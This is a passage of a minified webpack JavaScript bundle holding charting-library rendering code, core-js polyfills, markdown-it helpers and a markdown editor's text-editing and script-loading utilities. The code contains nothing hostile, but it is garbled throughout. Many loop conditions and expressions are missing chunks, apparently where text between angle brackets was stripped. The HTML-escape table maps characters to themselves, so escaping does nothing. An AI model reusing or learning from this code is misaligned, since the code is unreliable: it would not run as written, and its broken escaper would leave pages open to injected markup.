i.Rect({shape:{x:a,y:s,width:l,height:u}});return t&&(h.shape[o?"width":"height"]=0,i.initProps(h,{shape:{width:l,height:u}},n)),h}function s(e,t,n){var r=e.getArea(),a=new i.Sector({shape:{cx:o(e.cx,1),cy:o(e.cy,1),r0:o(r.r0,1),r:o(r.r,1),startAngle:r.startAngle,endAngle:r.endAngle,clockwise:r.clockwise}});return t&&(a.shape.endAngle=r.startAngle,i.initProps(a,{shape:{endAngle:r.endAngle}},n)),a}function l(e,t,n){return e?"polar"===e.type?s(e,t,n):"cartesian2d"===e.type?a(e,t,n):null:null}t.createGridClipPath=a,t.createPolarClipPath=s,t.createClipPath=l},b0c0:function(e,t,n){var i=n("83ab"),r=n("9bf2").f,o=Function.prototype,a=o.toString,s=/^\s*function ([^ (]*)/,l="name";i&&!(l in o)&&r(o,l,{configurable:!0,get:function(){try{return a.call(this).match(s)[1]}catch(e){return""}}})},b11c:function(e,t,n){n("8ec5"),n("db9e"),n("4e9f"),n("d3a0"),n("767c"),n("7c4d"),n("df70")},b12f:function(e,t,n){var i=n("e1fc"),r=n("8918"),o=n("625e"),a=function(){this.group=new i,this.uid=r.getUID("viewComponent")};a.prototype={constructor:a,init:function(e,t){},render:function(e,t,n,i){},dispose:function(){},filterForExposedEvent:null};var s=a.prototype;s.updateView=s.updateLayout=s.updateVisual=function(e,t,n,i){},o.enableClassExtend(a),o.enableClassManagement(a,{registerWhenExtend:!0});var l=a;e.exports=l},b16f:function(e,t,n){var i=n("4ab1"),r=n("6d8b"),o=n("4942"),a=n("41ef");function s(e,t){i.call(this,e,t,["linearGradient","radialGradient"],"__gradient_in_use__")}r.inherits(s,i),s.prototype.addWithoutUpdate=function(e,t){if(t&&t.style){var n=this;r.each(["fill","stroke"],(function(i){if(t.style[i]&&("linear"===t.style[i].type||"radial"===t.style[i].type)){var r,o=t.style[i],a=n.getDefs(!0);o._dom?(r=o._dom,a.contains(o._dom)||n.addDom(r)):r=n.add(o),n.markUsed(t);var s=r.getAttribute("id");e.setAttribute(i,"url(#"+s+")")}}))}},s.prototype.add=function(e){var t;if("linear"===e.type)t=this.createElement("linearGradient");else{if("radial"!==e.type)return o("Illegal gradient type."),null;t=this.createElement("radialGradient")}return e.id=e.id||this.nextId++,t.setAttribute("id","zr"+this._zrId+"-gradient-"+e.id),this.updateDom(e,t),this.addDom(t),t},s.prototype.update=function(e){var t=this;i.prototype.update.call(this,e,(function(){var n=e.type,i=e._dom.tagName;"linear"===n&&"linearGradient"===i||"radial"===n&&"radialGradient"===i?t.updateDom(e,e._dom):(t.removeDom(e),t.add(e))}))},s.prototype.updateDom=function(e,t){if("linear"===e.type)t.setAttribute("x1",e.x),t.setAttribute("y1",e.y),t.setAttribute("x2",e.x2),t.setAttribute("y2",e.y2);else{if("radial"!==e.type)return void o("Illegal gradient type.");t.setAttribute("cx",e.x),t.setAttribute("cy",e.y),t.setAttribute("r",e.r)}e.global?t.setAttribute("gradientUnits","userSpaceOnUse"):t.setAttribute("gradientUnits","objectBoundingBox"),t.innerHTML="";for(var n=e.colorStops,i=0,r=n.length;i-1){var u=a.parse(l)[3],c=a.toHex(l);s.setAttribute("stop-color","#"+c),s.setAttribute("stop-opacity",u)}else s.setAttribute("stop-color",n[i].color);t.appendChild(s)}e._dom=t},s.prototype.markUsed=function(e){if(e.style){var t=e.style.fill;t&&t._dom&&i.prototype.markUsed.call(this,t._dom),t=e.style.stroke,t&&t._dom&&i.prototype.markUsed.call(this,t._dom)}};var l=s;e.exports=l},b1d4:function(e,t,n){var i=n("862d");function r(e,t){return t=t||{},i(t.coordDimensions||[],e,{dimsDef:t.dimensionsDefine||e.dimensionsDefine,encodeDef:t.encodeDefine||e.encodeDefine,dimCount:t.dimensionsCount,encodeDefaulter:t.encodeDefaulter,generateCoord:t.generateCoord,generateCoordCount:t.generateCoordCount})}e.exports=r},b2d8:function(module,exports,__webpack_require__){!function(e,t){module.exports=t()}(0,(function(){return function(e){function t(i){if(n[i])return n[i].exports;var r=n[i]={i:i,l:!1,exports:{}};return e[i].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var n={};return t.m=e,t.c=n,t.i=function(e){return e},t.d=function(e,n,i){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:i})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=68)}([function(e,t,n){"use strict";function i(e){return Object.prototype.toString.call(e)}function r(e){return"[object String]"===i(e)}function o(e,t){return x.call(e,t)}function a(e){return Array.prototype.slice.call(arguments,1).forEach((function(t){if(t){if("object"!=typeof t)throw new TypeError(t+"must be object");Object.keys(t).forEach((function(n){e[n]=t[n]}))}})),e}function s(e,t,n){return[].concat(e.slice(0,t),n,e.slice(t+1))}function l(e){return!(e>=55296&&e<=57343)&&!(e>=64976&&e<=65007)&&65535!=(65535&e)&&65534!=(65535&e)&&!(e>=0&&e<=8)&&11!==e&&!(e>=14&&e<=31)&&!(e>=127&&e<=159)&&!(e>1114111)}function u(e){if(e>65535){e-=65536;var t=55296+(e>>10),n=56320+(1023&e);return String.fromCharCode(t,n)}return String.fromCharCode(e)}function c(e,t){var n=0;return o(A,t)?A[t]:35===t.charCodeAt(0)&&M.test(t)&&(n="x"===t[1].toLowerCase()?parseInt(t.slice(2),16):parseInt(t.slice(1),10),l(n))?u(n):e}function h(e){return e.indexOf("\\")<0?e:e.replace(w,"$1")}function d(e){return e.indexOf("\\")<0&&e.indexOf("&")<0?e:e.replace(S,(function(e,t,n){return t||c(e,n)}))}function f(e){return I[e]}function p(e){return C.test(e)?e.replace(T,f):e}function g(e){return e.replace(D,"\\$&")}function m(e){switch(e){case 9:case 32:return!0}return!1}function v(e){if(e>=8192&&e<=8202)return!0;switch(e){case 9:case 10:case 11:case 12:case 13:case 32:case 160:case 5760:case 8239:case 8287:case 12288:return!0}return!1}function y(e){return L.test(e)}function _(e){switch(e){case 33:case 34:case 35:case 36:case 37:case 38:case 39:case 40:case 41:case 42:case 43:case 44:case 45:case 46:case 47:case 58:case 59:case 60:case 61:case 62:case 63:case 64:case 91:case 92:case 93:case 94:case 95:case 96:case 123:case 124:case 125:case 126:return!0;default:return!1}}function b(e){return e=e.trim().replace(/\s+/g," "),"Ṿ"==="ẞ".toLowerCase()&&(e=e.replace(/ẞ/g,"ß")),e.toLowerCase().toUpperCase()}var x=Object.prototype.hasOwnProperty,w=/\\([!"#$%&'()*+,\-.\/:;<=>?@[\\\]^_`{|}~])/g,k=/&([a-z#][a-z0-9]{1,31});/gi,S=new RegExp(w.source+"|"+k.source,"gi"),M=/^#((?:x[a-f0-9]{1,8}|[0-9]{1,8}))/i,A=n(52),C=/[&<>"]/,T=/[&<>"]/g,I={"&":"&","<":"<",">":">",'"':"""},D=/[.?*+^$[\]\\(){}|-]/g,L=n(34);t.lib={},t.lib.mdurl=n(56),t.lib.ucmicro=n(196),t.assign=a,t.isString=r,t.has=o,t.unescapeMd=h,t.unescapeAll=d,t.isValidEntityCode=l,t.fromCodePoint=u,t.escapeHtml=p,t.arrayReplaceAt=s,t.isSpace=m,t.isWhiteSpace=v,t.isMdAsciiPunct=_,t.isPunctChar=y,t.escapeRE=g,t.normalizeReference=b},function(e,t){var n=e.exports="undefined"!=typeof window&&window.Math==Math?window:"undefined"!=typeof self&&self.Math==Math?self:Function("return this")();"number"==typeof __g&&(__g=n)},function(e,t){var n={}.hasOwnProperty;e.exports=function(e,t){return n.call(e,t)}},function(e,t,n){e.exports=!n(11)((function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a}))},function(e,t,n){var i=n(5),r=n(13);e.exports=n(3)?function(e,t,n){return i.f(e,t,r(1,n))}:function(e,t,n){return e[t]=n,e}},function(e,t,n){var i=n(9),r=n(42),o=n(28),a=Object.defineProperty;t.f=n(3)?Object.defineProperty:function(e,t,n){if(i(e),t=o(t,!0),i(n),r)try{return a(e,t,n)}catch(e){}if("get"in n||"set"in n)throw TypeError("Accessors not supported!");return"value"in n&&(e[t]=n.value),e}},function(e,t,n){var i=n(88),r=n(19);e.exports=function(e){return i(r(e))}},function(e,t,n){var i=n(26)("wks"),r=n(14),o=n(1).Symbol,a="function"==typeof o;(e.exports=function(e){return i[e]||(i[e]=a&&o[e]||(a?o:r)("Symbol."+e))}).store=i},function(e,t){e.exports=function(e){return"object"==typeof e?null!==e:"function"==typeof e}},function(e,t,n){var i=n(8);e.exports=function(e){if(!i(e))throw TypeError(e+" is not an object!");return e}},function(e,t){var n=e.exports={version:"2.6.11"};"number"==typeof __e&&(__e=n)},function(e,t){e.exports=function(e){try{return!!e()}catch(e){return!0}}},function(e,t){e.exports=!0},function(e,t){e.exports=function(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}},function(e,t){var n=0,i=Math.random();e.exports=function(e){return"Symbol(".concat(void 0===e?"":e,")_",(++n+i).toString(36))}},function(e,t){function n(e,t){var n=e[1]||"",r=e[3];if(!r)return n;if(t&&"function"==typeof btoa){var o=i(r);return[n].concat(r.sources.map((function(e){return"/*# sourceURL="+r.sourceRoot+e+" */"}))).concat([o]).join("\n")}return[n].join("\n")}function i(e){return"/*# sourceMappingURL=data:application/json;charset=utf-8;base64,"+btoa(unescape(encodeURIComponent(JSON.stringify(e))))+" */"}e.exports=function(e){var t=[];return t.toString=function(){return this.map((function(t){var i=n(t,e);return t[2]?"@media "+t[2]+"{"+i+"}":i})).join("")},t.i=function(e,n){"string"==typeof e&&(e=[[null,e,""]]);for(var i={},r=0;rn.parts.length&&(i.parts.length=n.parts.length)}else{var a=[];for(r=0;r0?i:n)(e)}},function(e,t,n){var i=n(8);e.exports=function(e,t){if(!i(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!i(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!i(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!i(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}},function(e,t,n){var i=n(1),r=n(10),o=n(12),a=n(30),s=n(5).f;e.exports=function(e){var t=r.Symbol||(r.Symbol=o?{}:i.Symbol||{});"_"==e.charAt(0)||e in t||s(t,e,{value:a.f(e)})}},function(e,t,n){t.f=n(7)},function(e,t,n){function i(e,t){return new o(t).process(e)}var r=n(50),o=n(111);for(var a in t=e.exports=i,t.FilterCSS=o,r)t[a]=r[a];"undefined"!=typeof window&&(window.filterCSS=e.exports)},function(e,t,n){"use strict";function i(){this.__rules__=[],this.__cache__=null}i.prototype.__find__=function(e){for(var t=0;t=0&&(n=this.attrs[t][1]),n},i.prototype.attrJoin=function(e,t){var n=this.attrIndex(e);n<0?this.attrPush([e,t]):this.attrs[n][1]=this.attrs[n][1]+" "+t},e.exports=i},function(e,t){e.exports=/[!-#%-\*,-\/:;\?@\[-\]_\{\}\xA1\xA7\xAB\xB6\xB7\xBB\xBF\u037E\u0387\u055A-\u055F\u0589\u058A\u05BE\u05C0\u05C3\u05C6\u05F3\u05F4\u0609\u060A\u060C\u060D\u061B\u061E\u061F\u066A-\u066D\u06D4\u0700-\u070D\u07F7-\u07F9\u0830-\u083E\u085E\u0964\u0965\u0970\u09FD\u0A76\u0AF0\u0C84\u0DF4\u0E4F\u0E5A\u0E5B\u0F04-\u0F12\u0F14\u0F3A-\u0F3D\u0F85\u0FD0-\u0FD4\u0FD9\u0FDA\u104A-\u104F\u10FB\u1360-\u1368\u1400\u166D\u166E\u169B\u169C\u16EB-\u16ED\u1735\u1736\u17D4-\u17D6\u17D8-\u17DA\u1800-\u180A\u1944\u1945\u1A1E\u1A1F\u1AA0-\u1AA6\u1AA8-\u1AAD\u1B5A-\u1B60\u1BFC-\u1BFF\u1C3B-\u1C3F\u1C7E\u1C7F\u1CC0-\u1CC7\u1CD3\u2010-\u2027\u2030-\u2043\u2045-\u2051\u2053-\u205E\u207D\u207E\u208D\u208E\u2308-\u230B\u2329\u232A\u2768-\u2775\u27C5\u27C6\u27E6-\u27EF\u2983-\u2998\u29D8-\u29DB\u29FC\u29FD\u2CF9-\u2CFC\u2CFE\u2CFF\u2D70\u2E00-\u2E2E\u2E30-\u2E4E\u3001-\u3003\u3008-\u3011\u3014-\u301F\u3030\u303D\u30A0\u30FB\uA4FE\uA4FF\uA60D-\uA60F\uA673\uA67E\uA6F2-\uA6F7\uA874-\uA877\uA8CE\uA8CF\uA8F8-\uA8FA\uA8FC\uA92E\uA92F\uA95F\uA9C1-\uA9CD\uA9DE\uA9DF\uAA5C-\uAA5F\uAADE\uAADF\uAAF0\uAAF1\uABEB\uFD3E\uFD3F\uFE10-\uFE19\uFE30-\uFE52\uFE54-\uFE61\uFE63\uFE68\uFE6A\uFE6B\uFF01-\uFF03\uFF05-\uFF0A\uFF0C-\uFF0F\uFF1A\uFF1B\uFF1F\uFF20\uFF3B-\uFF3D\uFF3F\uFF5B\uFF5D\uFF5F-\uFF65]|\uD800[\uDD00-\uDD02\uDF9F\uDFD0]|\uD801\uDD6F|\uD802[\uDC57\uDD1F\uDD3F\uDE50-\uDE58\uDE7F\uDEF0-\uDEF6\uDF39-\uDF3F\uDF99-\uDF9C]|\uD803[\uDF55-\uDF59]|\uD804[\uDC47-\uDC4D\uDCBB\uDCBC\uDCBE-\uDCC1\uDD40-\uDD43\uDD74\uDD75\uDDC5-\uDDC8\uDDCD\uDDDB\uDDDD-\uDDDF\uDE38-\uDE3D\uDEA9]|\uD805[\uDC4B-\uDC4F\uDC5B\uDC5D\uDCC6\uDDC1-\uDDD7\uDE41-\uDE43\uDE60-\uDE6C\uDF3C-\uDF3E]|\uD806[\uDC3B\uDE3F-\uDE46\uDE9A-\uDE9C\uDE9E-\uDEA2]|\uD807[\uDC41-\uDC45\uDC70\uDC71\uDEF7\uDEF8]|\uD809[\uDC70-\uDC74]|\uD81A[\uDE6E\uDE6F\uDEF5\uDF37-\uDF3B\uDF44]|\uD81B[\uDE97-\uDE9A]|\uD82F\uDC9F|\uD836[\uDE87-\uDE8B]|\uD83A[\uDD5E\uDD5F]/},function(e,t){e.exports={indexOf:function(e,t){var n,i;if(Array.prototype.indexOf)return e.indexOf(t);for(n=0,i=e.length;n0)return n[0].addEventListener("load",(function(){t()})),void t();var i=document.createElement("script"),r=document.getElementsByTagName("head")[0];i.type="text/javascript",i.charset="UTF-8",i.src=e,i.addEventListener?i.addEventListener("load",(function(){t()}),!1):i.attachEvent&&i.attachEvent("onreadystatechange",(function(){"loaded"===window.event.srcElement.readyState&&t()})),r.appendChild(i)}function u(e,t,n){if("function"!=typeof t&&(t=function(){}),document.querySelectorAll("link[href='"+e+"']").length>0)t();else{if(n){var i=document.querySelectorAll("link#"+n);if(i.length)return void(i[0].href=e)}var r=document.createElement("link"),o=document.getElementsByTagName("head")[0];r.rel="stylesheet",r.href=e,n&&(r.id=n),r.addEventListener?r.addEventListener("load",(function(){t()}),!1):r.attachEvent&&r.attachEvent("onreadystatechange",(function(){"loaded"===window.event.srcElement.readyState&&t()})),o.appendChild(r)}}Object.defineProperty(t,"__esModule",{value:!0}),t.loadScript=l,t.loadLink=u;var c=(t.insertTextAtCaret=function(e,t,n){var i=t.prefix,r=t.subfix,a=t.str;if(t.type,e.focus(),o(e)){var l=e.selectionStart,u=e.selectionEnd,c=e.value;l===u?(e.value=c.substring(0,l)+i+a+r+c.substring(u,c.length),e.selectionStart=l+i.length,e.selectionEnd=l+(a.length+i.length)):c.substring(l-i.length,l)===i&&c.substring(u,u+r.length)===r&&s(i,r,c,l,u)?(e.value=c.substring(0,l-i.length)+c.substring(l,u)+c.substring(u+r.length,c.length),e.selectionStart=l-i.length,e.selectionEnd=u-i.length):(e.value=c.substring(0,l)+i+c.substring(l,u)+r+c.substring(u,c.length),e.selectionStart=l+i.length,e.selectionEnd=l+(u-l+i.length))}else alert("Error: Browser version is too low");n.d_value=e.value,e.focus()},{prefix:"```",subfix:"\n```\n",defaultLanguageText:"language"});t.insertCodeBlock=function(e){var t=e.getTextareaDom();if(o(t)){var n=c.defaultLanguageText,s=t.selectionStart,l=t.selectionEnd,u=t.value;if(s===l)i(n,"",t);else if(a(t))r(t);else{var h=u.substring(s,l);i("",h,t)}e.d_value=t.value,t.focus()}else alert("Error: Browser version is too low")},t.insertOl=function(e){var t=e.getTextareaDom();if(o(t)){var n=t.selectionStart,i=t.selectionEnd,r=t.value;if(n===i)t.value=r.substring(0,n)+"1. "+r.substring(i,r.length),t.selectionEnd=t.selectionStart=n+3;else{for(var a=n;a>0&&"\n"!==r.substring(a-1,a);)a--;for(var s=r.substring(a,i),l=s.split("\n"),u=0;u0&&"\n"!==r.substring(a-1,a);)a--;for(var s=i;s0&&"\n"!==r.substring(a-1,a);)a--;var s=r.substring(a,i),l=s.replace(/\n/g,"\n- ");l="- "+l,t.value=r.substring(0,a)+l+r.substring(i,r.length),t.selectionStart=a,t.selectionEnd=i+l.length-s.length}}else alert("Error: Browser version is too low");e.d_value=t.value,t.focus()},t.insertTab=function(e,t){t=t?new Array(t).fill(" ").join(""):"\t";var n=e.getTextareaDom();if(o(n)){var i=n.selectionStart,r=n.selectionEnd,a=n.value,s=a.substring(0,i).split("\n").pop();if(s.match(/^\s*[0-9]+\.\s+\S*/)){var l=s.replace(/(\d+)/,1);n.value=a.substring(0,i-l.length)+t+l+a.substring(r,a.length)}else s.match(/^\s*-\s+\S*/)?n.value=a.substring(0,i-s.length)+t+s+a.substring(r,a.length):n.value=a.substring(0,i)+t+a.substring(r,a.length);n.selectionStart=n.selectionEnd=i+t.length}else alert("Error: Browser version is too low");e.d_value=n.value,n.focus()},t.unInsertTab=function(e,t){var n=new RegExp(t?"\\s{"+t+"}":"\t");console.log("regTab:",n);var i=e.getTextareaDom();if(o(i)){var r=i.selectionStart,a=i.selectionEnd,s=i.value,l=s.substring(0,r).split("\n").pop();l.search(n)>=0&&(i.value=s.substring(0,r-l.length)+l.replace(n,"")+s.substring(a,s.length),i.selectionStart=i.selectionEnd=r-(t||1))}else alert("Error: Browser version is too low");e.d_value=i.value,i.focus()},t.insertEnter=function(e,t){var n=e.getTextareaDom();if(o(n)){var i=n.selectionStart,r=n.selectionEnd,a=n.value,s=a.substring(0,i).split("\n").pop(),l=s.match(/^\s*(?:[0-9]+\.|-)\s+\S+/);if(l){t.preventDefault();var u=l.shift().match(/^\s*(?:[0-9]+\.|-)\s/).shift();if(u.search(/-/)>=0)n.value=a.substring(0,i)+"\n"+u+a.substring(r,a.length),n.selectionStart=n.selectionEnd=i+u.length+1;else{var c=u.replace(/(\d+)/,parseInt(u)+1);n.value=a.substring(0,i)+"\n"+c+a.substring(r,a.length),n.selectionStart=n.selectionEnd=i+c.length+1}}else{var h=s.match(/^\s*(?:[0-9]+\.|-)\s+$/);if(h){t.preventDefault();var d=h.shift().length;n.value=a.substring(0,i-d)+"\n"+a.substring(r,a.length),n.selectionStart=n.selectionEnd=i-d}}}else alert("Error: Browser version is too low");e.d_value=n.value,n.focus()},t.getNavigation=function(e,t){var n=void 0;n=e.$refs.navigationContent,n.innerHTML=e.d_render;var i=n.children;if(i.length)for(var r=0;r=0&&n.scrollHeight!==t.edit_scroll_height&&n.scrollHeight-n.offsetHeight-n.scrollTop<=30&&(t.$refs.vNoteEdit.scrollTop=n.scrollHeight-n.offsetHeight,i=1),t.edit_scroll_height=n.scrollHeight,t.$refs.vShowContent.scrollHeight>t.$refs.vShowContent.offsetHeight&&(t.$refs.vShowContent.scrollTop=(t.$refs.vShowContent.scrollHeight-t.$refs.vShowContent.offsetHeight)*i)},t.fullscreenchange=function(e){e.$el.addEventListener("fullscreenchange",(function(t){e.$toolbar_right_read_change_status()}),!1),e.$el.addEventListener("mozfullscreenchange",(function(t){e.$toolbar_right_read_change_status()}),!1),e.$el.addEventListener("webkitfullscreenchange",(function(t){e.$toolbar_right_read_change_status()}),!1),e.$el.addEventListener("msfullscreenchange",(function(t){e.$toolbar_right_read_change_status()}),!1)},t.windowResize=function(e){function t(){e.$el.clientWidth>768?e.s_subfield=e.subfield:e.s_subfield=!1}t(),window.addEventListener("resize",t)},t.ImagePreviewListener=function(e){e.$refs.vShowContent.addEventListener("click",(function(t){t=t||window.event;var n=t.srcElement?t.srcElement:t.target;"IMG"===n.tagName&&(null!=e.imageClick?e.imageClick(n):e.d_preview_imgsrc=n.src)}))}},function(e,t){var n={}.toString;e.exports=function(e){return n.call(e).slice(8,-1)}},function(e,t,n){var i=n(8),r=n(1).document,o=i(r)&&i(r.createElement);e.exports=function(e){return o?r.createElement(e):{}}},function(e,t,n){var i=n(1),r=n(10),o=n(85),a=n(4),s=n(2),l=function(e,t,n){var u,c,h,d=e&l.F,f=e&l.G,p=e&l.S,g=e&l.P,m=e&l.B,v=e&l.W,y=f?r:r[t]||(r[t]={}),_=y.prototype,b=f?i:p?i[t]:(i[t]||{}).prototype;for(u in f&&(n=t),n)(c=!d&&b&&void 0!==b[u])&&s(y,u)||(h=c?b[u]:n[u],y[u]=f&&"function"!=typeof b[u]?n[u]:m&&c?o(h,i):v&&b[u]==h?function(e){var t=function(t,n,i){if(this instanceof e){switch(arguments.length){case 0:return new e;case 1:return new e(t);case 2:return new e(t,n)}return new e(t,n,i)}return e.apply(this,arguments)};return t.prototype=e.prototype,t}(h):g&&"function"==typeof h?o(Function.call,h):h,g&&((y.virtual||(y.virtual={}))[u]=h,e&l.R&&_&&!_[u]&&a(_,u,h)))};l.F=1,l.G=2,l.S=4,l.P=8,l.B=16,l.W=32,l.U=64,l.R=128,e.exports=l},function(e,t,n){e.exports=!n(3)&&!n(11)((function(){return 7!=Object.defineProperty(n(40)("div"),"a",{get:function(){return 7}}).a}))},function(e,t,n){"use strict";var i=n(12),r=n(41),o=n(48),a=n(4),s=n(21),l=n(90),u=n(24),c=n(96),h=n(7)("iterator"),d=!([].keys&&"next"in[].keys()),f=function(){return this};e.exports=function(e,t,n,p,g,m,v){l(n,t,p);var y,_,b,x=function(e){if(!d&&e in M)return M[e];switch(e){case"keys":case"values":return function(){return new n(this,e)}}return function(){return new n(this,e)}},w=t+" Iterator",k="values"==g,S=!1,M=e.prototype,A=M[h]||M["@@iterator"]||g&&M[g],C=A||x(g),T=g?k?x("entries"):C:void 0,I="Array"==t&&M.entries||A;if(I&&(b=c(I.call(new e)))!==Object.prototype&&b.next&&(u(b,w,!0),i||"function"==typeof b[h]||a(b,h,f)),k&&A&&"values"!==A.name&&(S=!0,C=function(){return A.call(this)}),i&&!v||!d&&!S&&M[h]||a(M,h,C),s[t]=C,s[w]=f,g)if(y={values:k?C:x("values"),keys:m?C:x("keys"),entries:T},v)for(_ in y)_ in M||o(M,_,y[_]);else r(r.P+r.F*(d||S),t,y);return y}},function(e,t,n){var i=n(9),r=n(93),o=n(20),a=n(25)("IE_PROTO"),s=function(){},l=function(){var e,t=n(40)("iframe"),i=o.length;for(t.style.display="none",n(87).appendChild(t),t.src="javascript:",e=t.contentWindow.document,e.open(),e.write("